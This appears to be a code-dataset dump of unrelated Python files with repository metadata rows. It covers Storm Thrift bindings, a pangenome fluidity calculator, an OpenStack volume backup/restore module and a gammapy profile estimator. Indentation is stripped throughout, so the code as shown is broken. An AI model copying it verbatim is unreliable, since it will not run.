self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getUserTopology_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getUserTopology_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (StormTopology, StormTopology.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = StormTopology()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getUserTopology_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
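# A minimal usage sketch (an assumption, not part of the generated file: it presumes the
# generated ``Client`` class for this Nimbus service is defined earlier in this module and
# that Nimbus is reachable over Thrift's framed binary protocol, as Storm configures it):
#
#   from thrift.transport import TSocket, TTransport
#   from thrift.protocol import TBinaryProtocol
#
#   transport = TTransport.TFramedTransport(TSocket.TSocket('nimbus-host', 6627))
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)
#   client = Client(protocol)                           # generated service client
#   transport.open()
#   summary = client.getClusterInfo()                   # ClusterSummary struct
#   conf_json = client.getTopologyConf('topology-id')   # hypothetical topology id
#   transport.close()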
| 2 | 2 |
gemucator/__init__.py | philipwfowler/genucator | 0 | 5511 | #! /usr/bin/env python
from .core import gemucator
| 1.015625 | 1 |
client/checkout/schema/types.py | daniel-waruo/e-commerse-api | 6 | 5512 |
import graphene
from graphene_django import DjangoObjectType
from graphene_django.converter import convert_django_field
from pyuploadcare.dj.models import ImageField
| 1.15625 | 1 |
pangenome_fluidity.py | PlantDr430/CSU_scripts | 1 | 5513 | #!/usr/bin/python3
'''
This script follows formulas put forth in Kislyuk et al. (2011) to calculate genome
fluidity of a pangenome dataset. Variance and standard error are estimated as total
variance containing both the variance due to subsampling all possible combinations
(without replacement) of N genomes from the total pool of genomes and the variance
due to the limited number of sampled genomes (variance of the pangenome)(Kislyuk et al. 2011).
However, the script has a default max number of subsamples set to 250,000 for each N genomes.
This can be altered with the -max_sub / --max_subsamples flag or turned off with the --max_off flag.
Turning the max_off will force calculations to be done on all possible subsample combinations
of N genomes. For samples of N genomes that were stopped at the max number of subsamples, the subsamples
are sampled WITH replacement and variance is calculated with a delta degrees of freedom of 1 (i.e. dividing by n - 1).
Results are a text file of fluidity, variance, and standard error for all N genome samples
and a figure of pangenome fluidity with shaded regions showing total standard error with an
exponential regression fit.
Notes
1. This will only work if you have at least 5 isolates to make up your pangenome.
2. If you have 5 isolates your graph will probably not look pretty as it's difficult
to fit with such a low number of samples.
'''
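# Formula reference (a sketch of what the functions below implement; notation loosely
# follows Kislyuk et al. 2011):
#
#   For a genome pair (k, l):
#       ratio_kl = (U_k + U_l) / ((U_k + Shared) + (U_l + Shared))
#   where U_k and U_l are gene clusters unique to each genome and Shared are clusters
#   containing both genomes.
#
#   Fluidity of an N-genome sample:
#       phi = 2 / (N * (N - 1)) * sum(ratio_kl over all pairs in the sample)
#
#   Jackknife variance over the full set of N genomes:
#       var(phi) = ((N - 1) / N) * sum((phi_i - mean_phi_i)**2)
#   where each phi_i is the fluidity computed with one genome left out.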
import os, sys, re, argparse, random, itertools, scipy, warnings, subprocess
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from multiprocessing import Pool
from itertools import combinations
from collections import OrderedDict
from collections.abc import Iterable
from scipy.optimize import curve_fit, differential_evolution
rundir = os.getcwd()
class MyFormatter(argparse.RawTextHelpFormatter):
def __init__(self, prog):
super(MyFormatter, self).__init__(prog, max_help_position=48)
parser = argparse.ArgumentParser(
usage='./%(prog)s [options] -i orthogroups -o output_folder',
description = ''' Performs multiple bootstraps and calculates genome fluidity
from a pangenome dataset (orthogroups).''',
epilog = """Written by <NAME> (2019)""",
formatter_class = MyFormatter)
parser.add_argument(
'-i',
'--input',
required = True,
help = 'Orthogroups file, see format in READ.me',
metavar=''
)
parser.add_argument(
'-o',
'--out',
required = True,
help = 'Output folder',
metavar=''
)
parser.add_argument(
'-c',
'--cpus',
type=int,
default=1,
help = 'Number of cores to use for multiprocessing [default: 1]',
metavar=''
)
parser.add_argument(
'-max_sub',
'--max_subsamples',
type=int,
default=250000,
help = 'Max number of subsamples to run on N genomes sampled. [default: 250000]',
metavar=''
)
parser.add_argument(
'--max_off',
action='store_true',
    help = 'Turn off the max subsamples. This will cause the script to sample ALL possible '\
    'combinations for N genomes',
)
parser.add_argument(
'-p',
'--prefix',
help = 'Prefix to append to the result files (such as Genus, species, etc.)',
metavar=''
)
args=parser.parse_args()
if not os.path.isdir(args.out):
os.makedirs(os.path.join(args.out))
result_dir = os.path.abspath(os.path.join(rundir, args.out))
if args.input:
input_file = os.path.abspath(args.input)
else:
    print('ERROR: No orthogroups file was provided, please provide one with -i or --input')
sys.exit()
if args.prefix:
fluid_results = os.path.abspath(os.path.join(result_dir, args.prefix+'_fluidity.txt'))
fluid_fig = os.path.abspath(os.path.join(result_dir, args.prefix+'_fluidity.png'))
else:
fluid_results = os.path.abspath(os.path.join(result_dir, 'Pangenome_fluidity.txt'))
fluid_fig = os.path.abspath(os.path.join(result_dir, 'Pangenome_fluidity.png'))
def create_ortho_dictionary(ortho_file): # create dictionary of gene clusters and isolates per cluster
    '''Generate dictionary of Orthogroups.'''
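    # Expected input format (hypothetical cluster/gene names for illustration): one
    # cluster per line, with the cluster id separated from its genes by ':', a tab,
    # or a single space, e.g.
    #   OG0000001: isolateA_gene1 isolateB_gene7 isolateC_gene3
    # The isolate name is taken as everything before the first '_' of each gene id.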
print('Creating ortholog dictionary')
ortho_isolates_dict = OrderedDict() # {Protein Cluster : list of isolates represented in cluster}
with open(ortho_file, 'r') as infile:
ortho_list = [item.strip() for item in sorted(infile)]
for line in ortho_list:
iso_list = []
if ':' in line:
cluster, genes = line.split(':')
elif '\t' in line:
cluster, genes = line.split('\t', 1)
else:
cluster, genes = line.split(' ', 1)
for match in re.finditer(r'([^\s]+)', genes):
isolate = match.group(0).split('_')[0]
iso_list.append(isolate)
ortho_isolates_dict[cluster] = list(set(iso_list))
return ortho_isolates_dict
def create_pair_dictionary(ortho_dictionary):
    '''Create all possible unique pairs of isolates and compute, for each pair,
    the ratio of unique gene clusters to total gene clusters.'''
print('Creating dictionary of paired ratio values')
pair_dict = {} # {(Isolate1, Isolate2) : [ratio of sum(unique clusters)/sum(all clusters)]}
for i in range(0, len(iso_list)):
for x in range(0, len(iso_list)):
if not iso_list[i] == iso_list[x]:
pair = tuple(sorted([iso_list[i], iso_list[x]]))
if not pair in pair_dict.keys():
cogs = {'Shared' : 0, 'Uk' : 0, 'Ul' : 0}
for k,v in ortho_dictionary.items():
if pair[0] in v and pair[1] in v:
cogs['Shared'] += 1
elif pair[0] in v and pair[1] not in v:
cogs['Uk'] += 1
elif pair[0] not in v and pair[1] in v:
cogs['Ul'] += 1
else:
pass # don't need to count a cluster if both isolates are not present
unique_pair = cogs['Uk'] + cogs['Ul']
all_pair = (cogs['Uk'] + cogs['Shared']) + (cogs['Ul'] + cogs['Shared'])
pair_dict[pair] = unique_pair/all_pair
return pair_dict
def compute_fluidity_all_genomes():
'''
Computes the fluidity and variance for the pangenome in question from the max number
of genomes in the pangenome.
'''
N = iso_num
fluidity_list = [ratio for ratio in pair_dict.values()] # list of ratios
pangenome_fluidity = (2/(N*(N-1)))*sum(fluidity_list) # get fluidity from average of all ratios
jack_samples = list(combinations(iso_list, N - 1)) # get list of all combos of N-1 from max num of genomes
fluidity_i_list = []
for sample in jack_samples:
jack_pairs = tuple(combinations(sample,2)) # get all pairs from current jackknife sample
jack_sample_fluidity = [pair_dict[tuple(sorted(p))] for p in jack_pairs] # get ratios from pair_dict
fluidity_i = (2/((N-1)*(N-2)))*sum(jack_sample_fluidity) # calculate fluidity_i
fluidity_i_list.append(fluidity_i)
fluidity_i_mean = np.mean(fluidity_i_list) # calculate fluidity_i_mean from all fluidity_i's
fluidity_variance = ((N-1)/N)*sum([(i-fluidity_i_mean)**2 for i in fluidity_i_list]) # calculate variance
return pangenome_fluidity, fluidity_variance
def subsample_multiprocess(combo_list):
'''
    Takes portions of the full combo_list and runs them on separate processes for faster processing.
    Calculates fluidity for each sample and returns a list of fluidities.
'''
N = len(combo_list[0]) # get N from number of genomes present
sample_process_list = []
for sample in combo_list:
pairs = tuple(combinations(sample,2))
pair_fluidity_list = [pair_dict[tuple(sorted(p))] for p in pairs]
sample_fluidity = (2/(N*(N-1)))*sum(pair_fluidity_list)
sample_process_list.append(sample_fluidity)
return sample_process_list
def genome_subsamples_fluidities(perm_list):
'''
Compute fluidities from all possible combinations of genomes from 3 to N randomly sampled genomes
    (N is the max number of genomes in the sample, so only sampled once). Has a cut-off of max subsamples
    at which point variances are calculated as sample variances (n-1) instead of full population
variances.
'''
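    # When the cap is hit, combinations are drawn WITH replacement (random.choices) and N
    # is recorded in perm_list so create_fluidity_results() later uses the sample variance
    # (ddof=1) for those values of N.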
sub_fluid_dict = {} # {N genomes sampled : [list of fluidities from subsamples]}
for N in range(3, iso_num + 1):
sub_fluid_dict[N] = []
N_combos = list(combinations(iso_list, N))
if args.max_off:
combos = N_combos
else:
if len(N_combos) > args.max_subsamples:
combos = random.choices(N_combos, k=args.max_subsamples)
perm_list.append(N)
else:
combos = N_combos
print('Performing fluidity calculations on {} subsample combinations of {} genomes'.format(len(combos),N))
if not len(N_combos) == 1:
chunk = round(len(combos)/args.cpus)
split_combos = [combos[i:i + chunk] for i in range(0, len(combos), chunk)]
pool = Pool(processes=args.cpus)
results = pool.imap(subsample_multiprocess, split_combos)
pool.close()
pool.join()
sub_fluid_dict[N].append(results)
else:
last_run = subsample_multiprocess(N_combos)
sub_fluid_dict[N].append(last_run)
sub_fluid_dict[N]=list(flatten(sub_fluid_dict[N]))
print(len(sub_fluid_dict[N]))
return sub_fluid_dict
def flatten(lis):
for item in lis:
if isinstance(item, Iterable) and not isinstance(item, str):
for x in flatten(item):
yield x
else:
yield item
def exponential(x, a, b, c):
return a * np.exp(b * x) + c
def neg_exponential(x, a, b, c):
return a * np.exp(-b * x) + c
def sumOfSquaredError(parameterTuple, x_values, y_curve_values, func):
warnings.filterwarnings("ignore") # do not print warnings by genetic algorithm
val = func(x_values, *parameterTuple)
return np.sum((y_curve_values - val) ** 2.0)
def generate_Initial_Parameters(x_values, y_curve_values, func):
# min and max used for bounds
maxX = max(x_values)
minX = min(x_values)
maxY = max(y_curve_values)
minY = min(y_curve_values)
maxXY = max(maxX, maxY)
parameterBounds = []
    parameterBounds.append([-maxXY, maxXY]) # search bounds for a
    parameterBounds.append([-maxXY, maxXY]) # search bounds for b
    parameterBounds.append([-maxXY, maxXY]) # search bounds for c
# "seed" the numpy random number generator for repeatable results
result = differential_evolution(sumOfSquaredError, parameterBounds, args=(x_values,y_curve_values, func), seed=3)
return result.x
def create_fluidity_results(figure_output, results_output):
total_variance = []
for i in range(3, iso_num + 1):
if i in permutation_list:
total_variance.append(np.var(sub_fluid_dict[i], ddof = 1) + pan_variance)
else:
total_variance.append(np.var(sub_fluid_dict[i]) + pan_variance)
total_variance = np.array(total_variance)
total_stderr = np.array([x**(1/2) for x in total_variance])
y_fluidity_values = np.array([pan_fluidity for i in range(3, iso_num + 1)])
x_labels = np.array([i for i in range(3, iso_num + 1)])
stderr_bottom = np.array([(pan_fluidity - v) for v in total_stderr])
stderr_top = np.array([(pan_fluidity + v) for v in total_stderr])
fig, ax = plt.subplots()
try: # Still had problems sometimes with fitting curves, this solution works best for now
geneticParameters_top = generate_Initial_Parameters(x_labels, stderr_top, exponential)
geneticParameters_bottom = generate_Initial_Parameters(x_labels, stderr_bottom, exponential)
popt_t, pcov = curve_fit(exponential, x_labels, stderr_top, geneticParameters_top, maxfev=10000)
popt_b, pcov = curve_fit(exponential, x_labels, stderr_bottom, geneticParameters_bottom, maxfev=10000)
if len(set(exponential(x_labels, *popt_t))) > 3 and len(set(exponential(x_labels, *popt_b))) > 3:
plt.fill_between(x_labels, exponential(x_labels, *popt_t), exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6)
top_curve = exponential(x_labels, *popt_t)
bottom_curve = exponential(x_labels, *popt_b)
if len(set(exponential(x_labels, *popt_t))) <= 3:
geneticParameters_top = generate_Initial_Parameters(x_labels, stderr_top, neg_exponential)
popt_t, pcov = curve_fit(neg_exponential, x_labels, stderr_top, geneticParameters_top, maxfev=10000)
plt.fill_between(x_labels, neg_exponential(x_labels, *popt_t), exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6)
top_curve = neg_exponential(x_labels, *popt_t)
bottom_curve = exponential(x_labels, *popt_b)
else:
pass
if len(set(exponential(x_labels, *popt_b))) <= 3:
geneticParameters_bottom = generate_Initial_Parameters(x_labels, stderr_bottom, neg_exponential)
popt_b, pcov = curve_fit(neg_exponential, x_labels, stderr_bottom, geneticParameters_bottom, maxfev=10000)
plt.fill_between(x_labels, exponential(x_labels, *popt_t), neg_exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6)
top_curve = exponential(x_labels, *popt_t)
bottom_curve = neg_exponential(x_labels, *popt_b)
else:
pass
except:
pass
ax.set_axisbelow(True)
plt.minorticks_on()
plt.grid(which='minor', axis='y', color='white', linestyle='--', alpha=0.3)
ax.yaxis.grid(True, linestyle='-', linewidth='1', which='major', color='white')
ax.xaxis.grid(True, linestyle='-', linewidth='1', which='major', color='white', alpha=0.5)
ax.tick_params(axis='x', which='minor', bottom=False)
ax.set_facecolor('gainsboro')
plt.plot(x_labels, y_fluidity_values, ls='--', lw=1, color='black') # plot y-values of fluidity
plt.xticks(np.arange(x_labels[0], x_labels[len(x_labels)-1]+1, 1.0)) # make sure x interval is 1
plt.xlim(x_labels[0], x_labels[len(x_labels)-1]) # adjust x limit so it starts with 3 at 0
max_y = max(stderr_top)
min_y = min(stderr_bottom)
plt.ylim((min_y - min_y*0.15), (max_y + max_y*0.15))
plt.xlabel('Number of genomes sampled')
plt.ylabel('Fluidity, '+u'\u03C6')
plt.tight_layout()
plt.savefig(figure_output)
with open(results_output, 'w') as results: # print out fluidity results
results.write('Genomes_Sampled\tFluidity\tTotal_Variance\tTotal_Stderr\tExponential_top\tExponential_bottom\n')
r_out = []
for i in range(0, iso_num-2):
r_out.append([str(i+3), str(pan_fluidity), str(total_variance[i]), str(total_stderr[i]),
str(top_curve[i]), str(bottom_curve[i])])
for line in r_out:
results.write('\t'.join(line) + '\n')
if __name__ == "__main__":
ortho_dict = create_ortho_dictionary(input_file)
iso_num = max([len(v) for v in ortho_dict.values()])
iso_list = list(set(itertools.chain.from_iterable([v for v in ortho_dict.values() if len(v) == iso_num])))
pair_dict = create_pair_dictionary(ortho_dict)
pan_results = compute_fluidity_all_genomes()
pan_fluidity = pan_results[0]
pan_variance = pan_results[1]
permutation_list = []
sub_fluid_dict = genome_subsamples_fluidities(permutation_list)
create_fluidity_results(fluid_fig, fluid_results)
| 2.671875 | 3 |
osvolbackup/backup.py | CCSGroupInternational/osvolbackup | 1 | 5514 | #
# This module provides the BackupGroup class, which encapsulates some complex
# operations related to backing up and restoring server instances
#
from __future__ import print_function
from json import loads
from neutronclient.v2_0 import client as neutron_client
from novaclient import client as nova_client
from cinderclient import client as cinder_client
from osvolbackup.server import ServerInstance, ServerNotFound
from osvolbackup.osauth import get_session, VERSION
from osvolbackup.verbose import vprint
from time import time, sleep
class BackupGroup(object):
max_secs_gbi = 300
poll_delay = 10
def __init__(self, serverName):
self.selected_metadata = None
self.selected_backups = []
self.selected_volumes = []
session = self.session = get_session()
self.neutron = neutron_client.Client(session=session)
self.nova = nova_client.Client(VERSION, session=session)
self.cinder = cinder_client.Client(VERSION, session=session)
try:
server = ServerInstance(serverName)
except ServerNotFound:
name = 'osvb_'+serverName
else:
name = 'osvb_'+server.instance.id
self.backup_list = self.cinder.backups.list(search_opts={"name": name})
self.volume_map = {}
if len(self.backup_list) == 0:
raise BackupNotFound(serverName)
# Load metadata from the backup description field
self.backup_meta_data = backup_meta_data = {}
for backup in self.backup_list:
meta_data = loads(backup.description)
backup_meta_data[backup.id] = meta_data
self.volume_map[backup.id] = {"id": backup.volume_id, "size": backup.size}
self.available_backups = sorted(set([b['backup_time'] for b in backup_meta_data.values()]))
def select_by_tag(self, tag):
if tag == 'last':
selected_backup_timestamp = self.available_backups[-1]
else:
raise BackupTooMany(tag)
# Get volumes associated with the selected backup
for backup_id, backup_meta in self.backup_meta_data.iteritems():
if backup_meta['backup_time'] == selected_backup_timestamp:
self.selected_backups.append(backup_id)
self.selected_volumes.append(self.volume_map[backup_id])
self.selected_metadata = backup_meta
def get_volumes(self):
return self.selected_volumes
def restore(self, server=None, network=None, to_project=None, skip_vm=False):
# flavor = self.nova.flavors.find(name=self.selected_metadata['flavor'])
new_volume_list = self._create_volumes(self.selected_volumes, to_project)
# Restore the volumes
block_device_mapping = {}
for i, backup_id in enumerate(self.selected_backups):
vol_index = self.backup_meta_data[backup_id]['vol_index']
new_volume_id = new_volume_list[i].id
vprint("Restoring from backup", backup_id, "to volume", new_volume_id)
dev_name = "vd" + chr(ord('a') + vol_index)
block_device_mapping[dev_name] = new_volume_id
restore = self.cinder.restores.restore(backup_id=backup_id, volume_id=new_volume_id)
restored_volume = self.cinder.volumes.get(restore.volume_id)
self._wait_for(restored_volume, ('restoring-backup',), 'available')
# We need to get again to refresh the metadata
restored_volume = self.cinder.volumes.get(restore.volume_id)
if vol_index == 0:
if not skip_vm:
name = restored_volume.metadata['osvb_name']
flavor = restored_volume.metadata['osvb_flavor']
flavor = self.nova.flavors.find(name=flavor) # name to id
saved_networks = loads(restored_volume.metadata['osvb_network'])
if not skip_vm:
nics = []
if network is not None:
net_name, net_ip = network.split("=")
net_id = self.neutron.list_networks(name=net_name)['networks'][0]['id']
nic_info = {'net-id': net_id, 'v4-fixed-ip': net_ip}
nics.append(nic_info)
else:
for network_name, network_ips in saved_networks.iteritems():
nic_info = {}
nic_info['net-id'] = self.neutron.list_networks(name=network_name)['networks'][0]['id']
nic_info['v4-fixed-ip'] = network_ips[0]
nics.append(nic_info)
target_session = get_session(to_project)
target_nova = nova_client.Client(VERSION, session=target_session)
server = target_nova.servers.create(
name=name, image=None, flavor=flavor, block_device_mapping=block_device_mapping, nics=nics
)
print("Server was restored into instance", server.id)
def _create_volumes(self, volume_list, to_project):
""" Create volumes based """
vprint("Creating volumes for the instance restore")
target_session = get_session(to_project)
target_cinder = cinder_client.Client(VERSION, session=target_session)
vol_list = []
for volume in volume_list:
vprint("Creating %dG volume" % volume['size'])
new_volume = target_cinder.volumes.create(volume['size'])
self._wait_for(new_volume, ('creating',), 'available')
vol_list.append(new_volume)
return vol_list
# Borrowed from https://github.com/Akrog/cinderback/blob/master/cinderback.py
def _wait_for(self, resource, allowed_states, expected_states=None, timeout=None):
"""Waits for a resource to come to a specific state.
:param resource: Resource we want to wait for
:param allowed_states: iterator with allowed intermediary states
:param expected_states: states we expect to have at the end, if None
is supplied then anything is good.
        :param timeout: Maximum number of seconds to wait; if None, a timeout
            proportional to the resource size is used
:return: The most updated resource
"""
if timeout:
deadline = time() + timeout
else:
deadline = time() + (self.max_secs_gbi * resource.size)
while resource.status in allowed_states:
sleep(self.poll_delay)
if deadline <= time():
raise TimeoutError(what=resource)
resource = resource.manager.get(resource.id)
if expected_states and resource.status not in expected_states:
raise UnexpectedStatus(what=resource, intermediate=allowed_states, final=expected_states)
return resource
class BackupException(Exception):
def __init__(self, what, *args, **kwargs):
super(BackupException, self).__init__(*args, **kwargs)
self.what = what
def __str__(self):
return u'%s: %s' % (self.__class__.__name__, self.what)
class UnexpectedStatus(BackupException):
def __init__(self, what, intermediate='', final='', *args, **kwargs):
super(UnexpectedStatus, self).__init__(what, *args, **kwargs)
self.intermediate = intermediate
self.final = final
def __str__(self):
if self.intermediate or self.final:
steps = (' [intermediate: %s, final: %s]' % (self.intermediate, self.final))
else:
steps = ''
return (u'%s: Status is %s%s' %
(self.__class__.__name__, self.what.status, steps))
class BackupNotFound(BackupException):
pass
class BackupTooMany(BackupException):
pass
| 2.25 | 2 |
gammapy/estimators/profile.py | JohannesBuchner/gammapy | 1 | 5515 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Tools to create profiles (i.e. 1D "slices" from 2D images)."""
import numpy as np
import scipy.ndimage
from astropy import units as u
from astropy.convolution import Box1DKernel, Gaussian1DKernel
from astropy.coordinates import Angle
from astropy.table import Table
from .core import Estimator
__all__ = ["ImageProfile", "ImageProfileEstimator"]
# TODO: implement measuring profile along arbitrary directions
# TODO: think better about error handling. e.g. MC based methods
class ImageProfileEstimator(Estimator):
"""Estimate profile from image.
Parameters
----------
x_edges : `~astropy.coordinates.Angle`
        Coordinate edges to define a custom measurement grid (optional).
method : ['sum', 'mean']
Compute sum or mean within profile bins.
axis : ['lon', 'lat', 'radial']
Along which axis to estimate the profile.
center : `~astropy.coordinates.SkyCoord`
Center coordinate for the radial profile option.
Examples
--------
This example shows how to compute a counts profile for the Fermi galactic
center region::
import matplotlib.pyplot as plt
from gammapy.maps import ImageProfileEstimator
from gammapy.maps import Map
from astropy import units as u
# load example data
filename = '$GAMMAPY_DATA/fermi-3fhl-gc/fermi-3fhl-gc-counts.fits.gz'
fermi_cts = Map.read(filename)
# set up profile estimator and run
p = ImageProfileEstimator(axis='lon', method='sum')
profile = p.run(fermi_cts)
# smooth profile and plot
smoothed = profile.smooth(kernel='gauss')
smoothed.peek()
plt.show()
"""
tag = "ImageProfileEstimator"
def __init__(self, x_edges=None, method="sum", axis="lon", center=None):
self._x_edges = x_edges
if method not in ["sum", "mean"]:
raise ValueError("Not a valid method, choose either 'sum' or 'mean'")
if axis not in ["lon", "lat", "radial"]:
raise ValueError("Not a valid axis, choose either 'lon' or 'lat'")
if method == "radial" and center is None:
raise ValueError("Please provide center coordinate for radial profiles")
self.parameters = {"method": method, "axis": axis, "center": center}
def _get_x_edges(self, image):
if self._x_edges is not None:
return self._x_edges
p = self.parameters
coordinates = image.geom.get_coord(mode="edges").skycoord
if p["axis"] == "lat":
x_edges = coordinates[:, 0].data.lat
elif p["axis"] == "lon":
lon = coordinates[0, :].data.lon
x_edges = lon.wrap_at("180d")
elif p["axis"] == "radial":
rad_step = image.geom.pixel_scales.mean()
corners = [0, 0, -1, -1], [0, -1, 0, -1]
rad_max = coordinates[corners].separation(p["center"]).max()
x_edges = Angle(np.arange(0, rad_max.deg, rad_step.deg), unit="deg")
return x_edges
def _estimate_profile(self, image, image_err, mask):
p = self.parameters
labels = self._label_image(image, mask)
profile_err = None
index = np.arange(1, len(self._get_x_edges(image)))
if p["method"] == "sum":
profile = scipy.ndimage.sum(image.data, labels.data, index)
if image.unit.is_equivalent("counts"):
profile_err = np.sqrt(profile)
elif image_err:
# gaussian error propagation
err_sum = scipy.ndimage.sum(image_err.data ** 2, labels.data, index)
profile_err = np.sqrt(err_sum)
elif p["method"] == "mean":
# gaussian error propagation
profile = scipy.ndimage.mean(image.data, labels.data, index)
if image_err:
N = scipy.ndimage.sum(~np.isnan(image_err.data), labels.data, index)
err_sum = scipy.ndimage.sum(image_err.data ** 2, labels.data, index)
profile_err = np.sqrt(err_sum) / N
return profile, profile_err
def _label_image(self, image, mask=None):
p = self.parameters
coordinates = image.geom.get_coord().skycoord
x_edges = self._get_x_edges(image)
if p["axis"] == "lon":
lon = coordinates.data.lon.wrap_at("180d")
data = np.digitize(lon.degree, x_edges.deg)
elif p["axis"] == "lat":
lat = coordinates.data.lat
data = np.digitize(lat.degree, x_edges.deg)
elif p["axis"] == "radial":
separation = coordinates.separation(p["center"])
data = np.digitize(separation.degree, x_edges.deg)
if mask is not None:
# assign masked values to background
data[mask.data] = 0
return image.copy(data=data)
def run(self, image, image_err=None, mask=None):
"""Run image profile estimator.
Parameters
----------
image : `~gammapy.maps.Map`
Input image to run profile estimator on.
image_err : `~gammapy.maps.Map`
Input error image to run profile estimator on.
mask : `~gammapy.maps.Map`
Optional mask to exclude regions from the measurement.
Returns
-------
profile : `ImageProfile`
Result image profile object.
"""
p = self.parameters
if image.unit.is_equivalent("count"):
image_err = image.copy(data=np.sqrt(image.data))
profile, profile_err = self._estimate_profile(image, image_err, mask)
result = Table()
x_edges = self._get_x_edges(image)
result["x_min"] = x_edges[:-1]
result["x_max"] = x_edges[1:]
result["x_ref"] = (x_edges[:-1] + x_edges[1:]) / 2
result["profile"] = profile * image.unit
if profile_err is not None:
result["profile_err"] = profile_err * image.unit
result.meta["PROFILE_TYPE"] = p["axis"]
return ImageProfile(result)
class ImageProfile:
"""Image profile class.
The image profile data is stored in `~astropy.table.Table` object, with the
following columns:
* `x_ref` Coordinate bin center (required).
* `x_min` Coordinate bin minimum (optional).
* `x_max` Coordinate bin maximum (optional).
* `profile` Image profile data (required).
* `profile_err` Image profile data error (optional).
Parameters
----------
table : `~astropy.table.Table`
Table instance with the columns specified as above.
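    Examples
    --------
    A minimal profile built by hand (column values are purely illustrative)::
        from astropy.table import Table
        from astropy import units as u
        table = Table()
        table["x_ref"] = [1.0, 2.0, 3.0] * u.deg
        table["profile"] = [10.0, 12.0, 8.0] * u.Unit("count")
        profile = ImageProfile(table)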
"""
def __init__(self, table):
self.table = table
def smooth(self, kernel="box", radius="0.1 deg", **kwargs):
r"""Smooth profile with error propagation.
Smoothing is described by a convolution:
.. math::
x_j = \sum_i x_{(j - i)} h_i
Where :math:`h_i` are the coefficients of the convolution kernel.
The corresponding error on :math:`x_j` is then estimated using Gaussian
error propagation, neglecting correlations between the individual
:math:`x_{(j - i)}`:
.. math::
\Delta x_j = \sqrt{\sum_i \Delta x^{2}_{(j - i)} h^{2}_i}
Parameters
----------
kernel : {'gauss', 'box'}
Kernel shape
radius : `~astropy.units.Quantity`, str or float
Smoothing width given as quantity or float. If a float is given it
is interpreted as smoothing width in pixels. If an (angular) quantity
            is given it is converted to pixels using `x_ref[1] - x_ref[0]`.
kwargs : dict
Keyword arguments passed to `~scipy.ndimage.uniform_filter`
('box') and `~scipy.ndimage.gaussian_filter` ('gauss').
Returns
-------
profile : `ImageProfile`
Smoothed image profile.
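        Examples
        --------
        An illustrative call (kernel and radius values are only examples)::
            smoothed = profile.smooth(kernel="gauss", radius="0.2 deg")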
"""
table = self.table.copy()
profile = table["profile"]
radius = u.Quantity(radius)
radius = np.abs(radius / np.diff(self.x_ref))[0]
width = 2 * radius.value + 1
if kernel == "box":
smoothed = scipy.ndimage.uniform_filter(
profile.astype("float"), width, **kwargs
)
# renormalize data
if table["profile"].unit.is_equivalent("count"):
smoothed *= int(width)
smoothed_err = np.sqrt(smoothed)
elif "profile_err" in table.colnames:
profile_err = table["profile_err"]
# use gaussian error propagation
box = Box1DKernel(width)
err_sum = scipy.ndimage.convolve(profile_err ** 2, box.array ** 2)
smoothed_err = np.sqrt(err_sum)
elif kernel == "gauss":
smoothed = scipy.ndimage.gaussian_filter(
profile.astype("float"), width, **kwargs
)
# use gaussian error propagation
if "profile_err" in table.colnames:
profile_err = table["profile_err"]
gauss = Gaussian1DKernel(width)
err_sum = scipy.ndimage.convolve(profile_err ** 2, gauss.array ** 2)
smoothed_err = np.sqrt(err_sum)
else:
raise ValueError("Not valid kernel choose either 'box' or 'gauss'")
table["profile"] = smoothed * self.table["profile"].unit
if "profile_err" in table.colnames:
table["profile_err"] = smoothed_err * self.table["profile"].unit
return self.__class__(table)
def plot(self, ax=None, **kwargs):
"""Plot image profile.
Parameters
----------
ax : `~matplotlib.axes.Axes`
Axes object
**kwargs : dict
Keyword arguments passed to `~matplotlib.axes.Axes.plot`
Returns
-------
ax : `~matplotlib.axes.Axes`
Axes object
"""
import matplotlib.pyplot as plt
if ax is None:
ax = plt.gca()
